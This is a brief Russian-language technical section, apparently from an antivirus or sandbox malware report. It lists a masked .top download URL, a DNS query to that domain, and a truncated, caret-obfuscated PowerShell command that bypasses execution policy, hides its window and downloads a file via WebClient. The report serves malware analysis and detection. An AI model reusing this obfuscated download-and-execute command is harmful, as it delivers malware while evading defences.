Техническая информация
- http://ho####wergop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OwER^sH^e^l^L^.^e^Xe^ -^eXe^cU^tioNPo^L^icy ^b^y^PaSS^ -n^op^rOfIle^ -wINDOWSTYLe hiDDE^n (^nEw^-^o^Bj^EC^T sy^s^T^eM.Net.W^eb^cLiE^nT).Do^w^nL^O^Ad^Fil^e(^'http://ho####wergop.t...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "P^OwER^sH^e^l^L^.^e^Xe^ -^eXe^cU^tioNPo^L^icy ^b^y^PaSS^ -n^op^rOfIle^ -wINDOWSTYLe hiDDE^n (^nEw^-^o^Bj^EC^T sy^s^T^eM.Net.W^eb^cLiE^nT).Do^w^nL^O^Ad^Fil^e(^'http://ho####wergop.t...' (со скрытым окном)